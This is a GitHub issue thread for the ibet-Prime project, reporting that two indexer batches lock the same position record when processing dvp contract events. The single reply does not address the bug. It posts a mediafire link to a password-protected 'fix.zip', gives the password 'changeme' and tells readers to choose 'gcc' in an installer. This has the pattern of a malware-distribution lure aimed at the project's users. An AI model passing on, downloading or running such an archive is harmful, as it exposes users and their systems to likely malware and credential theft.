### ISSUE TITLE
[BUG] Long lock duration when multiple batches try to update the same position record

### ISSUE THREAD

**Issue by purplesmoke05** [BoostryJP/ibet-Prime#687]
## Describe the bug

- In the indexer batch container, the `indexer_position_bond.py` and `indexer_position_share.py` scripts process events from the dvp contract. 
- During this process, both batches unintentionally attempt to update the same position record concurrently. 
- This results in a long query.

## Expected behavior
- Each batch should handle the events related to their own token type.

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
